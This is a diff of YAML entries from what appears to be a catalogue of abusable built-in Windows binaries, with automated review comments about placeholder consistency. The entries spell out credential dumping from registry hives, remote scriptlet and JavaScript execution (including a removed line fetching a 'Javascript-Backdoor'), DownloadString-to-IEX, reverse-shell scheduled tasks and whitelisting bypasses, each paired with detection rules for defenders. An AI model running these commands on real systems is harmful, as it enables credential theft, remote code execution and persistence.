- Command: reg save HKLM\SECURITY {PATH_ABSOLUTE:.1.bak} && reg save HKLM\SYSTEM {PATH_ABSOLUTE:.2.bak} && reg save HKLM\SAM {PATH_ABSOLUTE:.3.bak}
Description: Dump registry hives (SAM, SYSTEM, SECURITY) to retrieve password hashes and key material
Usecase: Dump credentials from the Security Account Manager (SAM)
Category: Credentials
@ -21,8 +21,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\reg.exe
- Path: C:\Windows\SysWOW64\reg.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regedit_import_keys.yml

View File

@ -1,11 +1,11 @@
---
Name: Regasm.exe
Description: Part of .NET
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: regasm.exe AllTheThingsx64.dll
Description: Loads the target .Net DLL file and executes the RegisterClass function.
- Command: regasm.exe {PATH:.dll}
Description: Loads the target .NET DLL file and executes the RegisterClass function.
Usecase: Execute code and bypass Application whitelisting
Category: AWL Bypass
Privileges: Local Admin
@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL (.NET)
- Command: regasm.exe /U AllTheThingsx64.dll
- Command: regasm.exe /U {PATH:.dll}
Description: Loads the target .DLL file and executes the UnRegisterClass function.
Usecase: Execute code and bypass Application whitelisting
Category: Execute

View File

@ -1,17 +1,17 @@
---
Name: Regedit.exe
Description: Used by Windows to manipulate registry
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
- Command: regedit /E {PATH_ABSOLUTE}:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
Description: Export the target Registry key to the specified .REG file.
Usecase: Hide registry data in alternate data stream
Category: ADS
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: regedit C:\ads\file.txt:regfile.reg
- Command: regedit {PATH_ABSOLUTE}:regfile.reg
Description: Import the target .REG file into the Registry.
Usecase: Import hidden registry data from alternate data stream
Category: ADS
@ -20,8 +20,6 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\regedit.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml
- IOC: regedit.exe reading and writing to alternate data stream

View File

@ -1,10 +1,10 @@
---
Name: Regini.exe
Description: Used to manipulate the registry
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2020-07-03
Commands:
- Command: regini.exe newfile.txt:hidden.ini
- Command: regini.exe {PATH}:hidden.ini
Description: Write registry keys from data inside the Alternate data stream.
Usecase: Write to registry
Category: ADS
@ -14,8 +14,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\regini.exe
- Path: C:\Windows\SysWOW64\regini.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regini_ads.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regini_execution.yml

View File

@ -1,10 +1,10 @@
---
Name: Register-cimprovider.exe
Description: Used to register new wmi providers
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: Register-cimprovider -path "C:\folder\evil.dll"
- Command: Register-cimprovider -path {PATH_ABSOLUTE:.dll}
Description: Load the target .DLL.
Usecase: Execute code within dll file
Category: Execute
@ -16,8 +16,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\Register-cimprovider.exe
- Path: C:\Windows\SysWOW64\Register-cimprovider.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_susp_register_cimprovider.yml
- IOC: Register-cimprovider.exe execution and cmdline DLL load may be supsicious

View File

@ -1,11 +1,11 @@
---
Name: Regsvcs.exe
Description: Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: regsvcs.exe AllTheThingsx64.dll
Description: Loads the target .Net DLL file and executes the RegisterClass function.
- Command: regsvcs.exe {PATH:.dll}
Description: Loads the target .NET DLL file and executes the RegisterClass function.
Usecase: Execute dll file and bypass Application whitelisting
Category: Execute
Privileges: User
@ -13,8 +13,8 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL (.NET)
- Command: regsvcs.exe AllTheThingsx64.dll
Description: Loads the target .Net DLL file and executes the RegisterClass function.
- Command: regsvcs.exe {PATH:.dll}
Description: Loads the target .NET DLL file and executes the RegisterClass function.
Usecase: Execute dll file and bypass Application whitelisting
Category: AWL Bypass
Privileges: Local Admin

View File

@ -1,10 +1,10 @@
---
Name: Regsvr32.exe
Description: Used by Windows to register dlls
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
- Command: regsvr32 /s /n /u /i:{REMOTEURL:.sct} scrobj.dll
Description: Execute the specified remote .SCT script with scrobj.dll.
Usecase: Execute code from remote scriptlet, bypass Application whitelisting
Category: AWL Bypass
@ -14,7 +14,7 @@ Commands:
Tags:
- Execute: SCT
- Execute: Remote
- Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
- Command: regsvr32.exe /s /u /i:{PATH:.sct} scrobj.dll
Description: Execute the specified local .SCT script with scrobj.dll.
Usecase: Execute code from scriptlet, bypass Application whitelisting
Category: AWL Bypass
@ -23,7 +23,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: SCT
- Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
- Command: regsvr32 /s /n /u /i:{REMOTEURL:.sct} scrobj.dll
Description: Execute the specified remote .SCT script with scrobj.dll.
Usecase: Execute code from remote scriptlet, bypass Application whitelisting
Category: Execute
@ -33,7 +33,7 @@ Commands:
Tags:
- Execute: SCT
- Execute: Remote
- Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
- Command: regsvr32.exe /s /u /i:{PATH:.sct} scrobj.dll
Description: Execute the specified local .SCT script with scrobj.dll.
Usecase: Execute code from scriptlet, bypass Application whitelisting
Category: Execute

View File

@ -1,18 +1,18 @@
---
Name: Replace.exe
Description: Used to replace file with another file
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: replace.exe C:\Source\File.cab C:\Destination /A
Description: Copy file.cab to destination
- Command: replace.exe {PATH_ABSOLUTE:.cab} {PATH_ABSOLUTE:folder} /A
Description: Copy .cab file to destination
Usecase: Copy files
Category: Copy
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A
Description: Download/Copy bar.exe to outdir
- Command: replace.exe {PATH_SMB:.exe} {PATH_ABSOLUTE:folder} /A
Description: Download/Copy executable to specified folder
Usecase: Download file
Category: Download
Privileges: User
@ -21,8 +21,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\replace.exe
- Path: C:\Windows\SysWOW64\replace.exe
Code_Sample:
- Code:
Detection:
- IOC: Replace.exe retrieving files from remote server
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_replace.yml

View File

@ -1,7 +1,7 @@
---
Name: Rpcping.exe
Description: Used to verify rpc connection
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM
@ -21,8 +21,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\rpcping.exe
- Path: C:\Windows\SysWOW64\rpcping.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_rpcping_credential_capture.yml
Resources:

View File

@ -1,20 +1,20 @@
---
Name: Rundll32.exe
Description: Used by Windows to execute dll files
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: rundll32.exe AllTheThingsx64,EntryPoint
Description: AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute.
Usecase: Execute dll file
- Command: rundll32.exe {PATH},EntryPoint
Description: First part should be a DLL file (any extension accepted), EntryPoint should be the name of the entry point in the DLL file to execute.
Usecase: Execute DLL file
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint
Description: Use Rundll32.exe to execute a DLL from a SMB share. EntryPoint is the name of the entry point in the .DLL file to execute.
- Command: rundll32.exe {PATH_SMB:.dll},EntryPoint
Description: Execute a DLL from an SMB share. EntryPoint is the name of the entry point in the DLL file to execute.
Usecase: Execute DLL from SMB share.
Category: Execute
Privileges: User
@ -23,16 +23,7 @@ Commands:
Tags:
- Execute: DLL
- Execute: Remote
- Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe.
Usecase: Proxy execution
Category: Execute
Privileges: User
MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: JScript
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:{REMOTEURL}")
Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script.
Usecase: Execute code from Internet
Category: Execute
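Review bot: this hunk deletes the inline-JavaScript rundll32 entry (the `javascript:"\..\mshtml.dll,RunHTMLApplication"` command together with its Description, Usecase, Category, Privileges, MitreID, OperatingSystem and Tags) instead of generalising it, while the commit message only speaks of generalising file paths and URLs; either retain the entry or state the reason for its removal in the commit message (for instance that it is redundant with the remote-script variant that follows), so consumers of the catalogue can tell an intentional drop from an accidental one.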
@ -41,7 +32,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: JScript
- Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain
- Command: rundll32 "{PATH}:ADSDLL.dll",DllMain
Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).
Usecase: Execute code from alternate data stream
Category: ADS

View File

@ -4,7 +4,7 @@ Description: Launcher process
Author: Grzegorz Tworek
Created: 2022-12-13
Commands:
- Command: runexehelper.exe c:\windows\system32\calc.exe
- Command: runexehelper.exe {PATH_ABSOLUTE:.exe}
Description: 'Launches the specified exe. Prerequisites: (1) diagtrack_action_output environment variable must be set to an existing, writable folder; (2) runexewithargs_output.txt file cannot exist in the folder indicated by the variable.'
Usecase: Executes arbitrary code
Category: Execute

View File

@ -1,11 +1,11 @@
---
Name: Runonce.exe
Description: Executes a Run Once Task that has been configured in the registry
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: Runonce.exe /AlternateShellStartup
Description: Executes a Run Once Task that has been configured in the registry
Description: Executes a Run Once Task that has been configured in the registry.
Usecase: Persistence, bypassing defensive counter measures
Category: Execute
Privileges: Administrator
@ -16,8 +16,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\runonce.exe
- Path: C:\Windows\SysWOW64\runonce.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_runonce_execution.yml

View File

@ -1,11 +1,11 @@
---
Name: Runscripthelper.exe
Description: Execute target PowerShell script
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test
Description: Execute the PowerShell script named test.txt
- Command: runscripthelper.exe surfacecheck \\?\{PATH_ABSOLUTE:.txt} {PATH_ABSOLUTE:folder}
Description: Execute the PowerShell script with .txt extension
Usecase: Bypass constrained language mode and execute Powershell script
Category: Execute
Privileges: User
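Review bot: the original arguments were related (`C:\Test\Microsoft\Diagnosis\scripts\test.txt` lives under the folder `C:\Test` passed as second argument); two independent placeholders lose that relationship, so if the script must sit below the folder argument, keep the subpath literal, e.g. `\\?\{PATH_ABSOLUTE:folder}\Microsoft\Diagnosis\scripts\{PATH:.txt}`. Also, "Execute the PowerShell script with .txt extension" reads better as "Execute a PowerShell script stored with a .txt extension".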
@ -16,8 +16,6 @@ Commands:
Full_Path:
- Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe
- Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_runscripthelper.yml
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules


@ -1,7 +1,7 @@
---
Name: Sc.exe
Description: Used by Windows to manage services
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice
@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: sc config <existing> binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" & sc start <existing>
- Command: sc config {ExistingServiceName} binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" & sc start {ExistingServiceName}
Description: Modifies an existing service and executes the file stored in the ADS.
Usecase: Execute binary file hidden inside an alternate data stream
Category: ADS
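Review bot: only the service name was generalised here while `c:\\ADS\\file.txt:cmd.exe` and `c:\ADS\works.txt` stay literal, unlike the Rundll32 ADS entry in this diff that became `{PATH}:ADSDLL.dll`; consider `{PATH:.txt}:cmd.exe` for consistency. `{ExistingServiceName}` also breaks the upper-case single-token style of the other placeholders (`{CMD}`, `{PID}`, `{CLSID}`); something like `{SERVICENAME}` would match.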
@ -25,8 +25,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\sc.exe
- Path: C:\Windows\SysWOW64\sc.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_susp_service_creation.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml


@ -1,10 +1,10 @@
---
Name: Schtasks.exe
Description: Schedule periodic tasks
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr c:\some\directory\revshell.exe
- Command: schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr "{CMD}"
Description: Create a recurring task to execute every minute.
Usecase: Create a recurring task to keep reverse shell session(s) alive
Category: Execute
@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CMD
- Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily
- Command: schtasks /create /s targetmachine /tn "MyTask" /tr "{CMD}" /sc daily
Description: Create a scheduled task on a remote computer for persistence/lateral movement
Usecase: Create a remote task to run daily relative to the the time of creation
Category: Execute
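Review bot: `targetmachine` on the `/s` switch is still a literal while the payload became `{CMD}`; since the point of the entry is remote creation, the host deserves a placeholder too. While here, the Usecase context line has a doubled word ("relative to the the time of creation").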
@ -25,8 +25,6 @@ Commands:
Full_Path:
- Path: c:\windows\system32\schtasks.exe
- Path: c:\windows\syswow64\schtasks.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_schtasks_creation.yml
- Elastic: https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/persistence_local_scheduled_task_creation.toml
@ -34,6 +32,3 @@ Detection:
- IOC: Suspicious task creation events
Resources:
- Link: https://isc.sans.edu/forums/diary/Adding+Persistence+Via+Scheduled+Tasks/23633/
Acknowledgement:
- Person:
Handle:


@ -1,11 +1,11 @@
---
Name: Scriptrunner.exe
Description: Execute binary through proxy binary to evade defensive counter measures
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: Scriptrunner.exe -appvscript calc.exe
Description: Executes calc.exe
- Command: Scriptrunner.exe -appvscript {PATH:.exe}
Description: Executes executable
Usecase: Execute binary through proxy binary to evade defensive counter measures
Category: Execute
Privileges: User
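Review bot: "Executes executable" is awkward; the ssh and Tttracer entries in this diff use "Executes specified command" / "Execute specified executable", so "Executes the specified executable" would read naturally and match them.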
@ -13,8 +13,8 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
Description: Executes calc.cmd from remote server
- Command: ScriptRunner.exe -appvscript {PATH_SMB:.cmd}
Description: Executes cmd file from remote server
Usecase: Execute binary through proxy binary from external server to evade defensive counter measures
Category: Execute
Privileges: User
@ -26,8 +26,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\scriptrunner.exe
- Path: C:\Windows\SysWOW64\scriptrunner.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_servu_susp_child_process.yml
- IOC: Scriptrunner.exe should not be in use unless App-v is deployed


@ -1,10 +1,10 @@
---
Name: SettingSyncHost.exe
Description: Host Process for Setting Synchronization
Author: 'Elliot Killick'
Author: Elliot Killick
Created: 2021-08-26
Commands:
- Command: SettingSyncHost -LoadAndRunDiagScript anything
- Command: SettingSyncHost -LoadAndRunDiagScript {PATH:.exe}
Description: Execute file specified in %COMSPEC%
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
Category: Execute
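Review bot: `{PATH:.exe}` contradicts the unchanged Description, which says the file executed is the one in `%COMSPEC%`; the original `anything` signalled that the argument value is irrelevant, so a neutral placeholder (or leaving `anything`) avoids implying the path is what gets run.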
@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows 8, Windows 8.1, Windows 10
Tags:
- Execute: EXE
- Command: SettingSyncHost -LoadAndRunDiagScriptNoCab anything
- Command: SettingSyncHost -LoadAndRunDiagScriptNoCab {PATH:.bat}
Description: Execute a batch script in the background (no window ever pops up) which can be subverted to running arbitrary programs by setting the current working directory to %TMP% and creating files such as reg.bat/reg.exe in that directory thereby causing them to execute instead of the ones in C:\Windows\System32.
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism. Additionally, effectively act as a -WindowStyle Hidden option (as there is in PowerShell) for any arbitrary batch file.
Category: Execute
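Review bot: same concern as the first command: the original argument was `anything`, and the Description attributes execution to files planted in the `%TMP%` working directory rather than to the argument, so `{PATH:.bat}` may suggest a parameter the binary does not consume; confirm the argument is actually used before keeping the extension hint.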


@ -1,11 +1,11 @@
---
Name: ssh.exe
Description: Ssh.exe is the OpenSSH compatible client can be used to connect to Windows 10 (build 1809 and later) and Windows Server 2019 devices.
Author: 'Akshat Pradhan'
Created: '2021-11-08'
Author: Akshat Pradhan
Created: 2021-11-08
Commands:
- Command: ssh localhost calc.exe
Description: Execute calc.exe on host machine. The prompt for password can be eliminated by adding the host's public key in the user's authorized_keys file. Adversaries can do the same for execution on remote machines.
- Command: ssh localhost "{CMD}"
Description: Executes specified command on host machine. The prompt for password can be eliminated by adding the host's public key in the user's authorized_keys file. Adversaries can do the same for execution on remote machines.
Usecase: Execute specified command, can be used for defense evasion.
Category: Execute
Privileges: User
@ -13,8 +13,8 @@ Commands:
OperatingSystem: Windows 10 1809, Windows Server 2019
Tags:
- Execute: CMD
- Command: ssh -o ProxyCommand=calc.exe .
Description: Executes calc.exe from ssh.exe
- Command: ssh -o ProxyCommand="{CMD}" .
Description: Executes specified command from ssh.exe
Usecase: Performs execution of specified file, can be used as a defensive evasion.
Category: Execute
Privileges: User


@ -1,10 +1,10 @@
---
Name: SyncAppvPublishingServer.exe
Description: Used by App-v to get App-v server lists
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"
- Command: SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('{REMOTEURL:.ps1}') | IEX"
Description: Example command on how inject Powershell code into the process
Usecase: Use SyncAppvPublishingServer as a Powershell host to execute Powershell code. Evade defensive counter measures
Category: Execute
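Review bot: the Description context line reads "how inject Powershell code"; while this file is touched, "how to inject PowerShell code" fixes the grammar and the product name.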
@ -16,8 +16,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\SyncAppvPublishingServer.exe
- Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/powershell/powershell_script/posh_ps_syncappvpublishingserver_exe.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/powershell/powershell_module/posh_pm_syncappvpublishingserver_exe.yml


@ -1,10 +1,10 @@
---
Name: Tar.exe
Description: Used by Windows to extract and create archives.
Author: 'Brian Lucero'
Author: Brian Lucero
Created: 2023-01-30
Commands:
- Command: tar -cf compressedfilename:ads C:\folder\file
- Command: tar -cf {PATH}:ads {PATH_ABSOLUTE:folder}
Description: Compress one or more files to an alternate data stream (ADS).
Usecase: Can be used to evade defensive countermeasures, or to hide as part of a persistence mechanism
Category: ADS
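Review bot: the source operand changed from a file (`C:\folder\file`) to `{PATH_ABSOLUTE:folder}` while the Description still says "Compress one or more files"; either keep a file placeholder or widen the Description to cover folders. The other two tar commands in this file use the relative `{PATH}` form, and tar accepts relative paths, so `{PATH:folder}` would also be consistent.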
@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows 10, Windows 11
Tags:
- Type: Compression
- Command: tar -xf compressedfilename:ads
- Command: tar -xf {PATH}:ads
Description: Decompress a compressed file from an alternate data stream (ADS).
Usecase: Can be used to evade defensive countermeasures, or to hide as part of a persistence mechanism
Category: ADS
@ -22,8 +22,8 @@ Commands:
OperatingSystem: Windows 10, Windows 11
Tags:
- Type: Compression
- Command: tar -xf \\host1\archive.tar
Description: Extracts archive.tar from the remote (internal) host (host1) to the current host.
- Command: tar -xf {PATH_SMB:.tar}
Description: Extracts archive.tar from the remote (internal) host to the current host.
Usecase: Copy files
Category: Copy
Privileges: User
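Review bot: the Description still names `archive.tar` literally although the Command now uses `{PATH_SMB:.tar}`; "Extracts the archive from the remote (internal) host to the current host" keeps prose and placeholder aligned.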


@ -1,11 +1,11 @@
---
Name: Ttdinject.exe
Description: Used by Windows 1809 and newer to Debug Time Travel (Underlying call of tttracer.exe)
Author: 'Maxime Nadeau'
Author: Maxime Nadeau
Created: 2020-05-12
Commands:
- Command: TTDInject.exe /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /Launch "C:/Windows/System32/calc.exe"
Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.
- Command: TTDInject.exe /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /Launch "{PATH:.exe}"
Description: Execute a program using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.
Usecase: Spawn process using other binary
Category: Execute
Privileges: Administrator
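Review bot: the `/Launch` target became `{PATH:.exe}` whereas the equivalent Tttracer entry in this diff uses `{PATH_ABSOLUTE:.exe}`; the original value here was absolute as well (`C:/Windows/System32/calc.exe`), so unless relative paths are known to work, `{PATH_ABSOLUTE:.exe}` keeps the two entries (and the second command below) consistent.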
@ -13,8 +13,8 @@ Commands:
OperatingSystem: Windows 10 2004 and above, Windows 11
Tags:
- Execute: EXE
- Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe"
Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.
- Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "{PATH:.exe}"
Description: Execute a program using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.
Usecase: Spawn process using other binary
Category: Execute
Privileges: Administrator
@ -25,8 +25,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\ttdinject.exe
- Path: C:\Windows\Syswow64\ttdinject.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/create_remote_thread/create_remote_thread_win_ttdinjec.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/7ea6ed3db65e0bd812b051d9bb4fffd27c4c4d0a/rules/windows/process_creation/proc_creation_win_lolbin_ttdinject.yml


@ -1,11 +1,11 @@
---
Name: Tttracer.exe
Description: Used by Windows 1809 and newer to Debug Time Travel
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2019-11-05
Commands:
- Command: tttracer.exe C:\windows\system32\calc.exe
Description: Execute calc using tttracer.exe. Requires administrator privileges
- Command: tttracer.exe {PATH_ABSOLUTE:.exe}
Description: Execute specified executable from tttracer.exe. Requires administrator privileges.
Usecase: Spawn process using other binary
Category: Execute
Privileges: Administrator
@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows 10 1809 and newer, Windows 11
Tags:
- Execute: EXE
- Command: TTTracer.exe -dumpFull -attach pid
- Command: TTTracer.exe -dumpFull -attach {PID}
Description: Dumps process using tttracer.exe. Requires administrator privileges
Usecase: Dump process by PID
Category: Dump
@ -23,8 +23,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\tttracer.exe
- Path: C:\Windows\SysWOW64\tttracer.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_tttracer_mod_load.yml


@ -1,7 +1,7 @@
---
Name: Unregmp2.exe
Description: Microsoft Windows Media Player Setup Utility
Author: 'Wade Hickey'
Author: Wade Hickey
Created: 2021-12-06
Commands:
- Command: rmdir %temp%\lolbin /s /q 2>nul & mkdir "%temp%\lolbin\Windows Media Player" & copy C:\Windows\System32\calc.exe "%temp%\lolbin\Windows Media Player\wmpnscfg.exe" >nul && cmd /V /C "set "ProgramW6432=%temp%\lolbin" && unregmp2.exe /HideWMP"
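Review bot: only the Author quoting changed here while the Command context line still carries the literal `C:\Windows\System32\calc.exe` as the payload that is copied to `wmpnscfg.exe`; given the purpose of this commit, that copy source should become `{PATH_ABSOLUTE:.exe}` like the other entries.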


@ -4,14 +4,14 @@ Description: Binary file used for compile vbs code
Author: Lior Adar
Created: 2020-02-27
Commands:
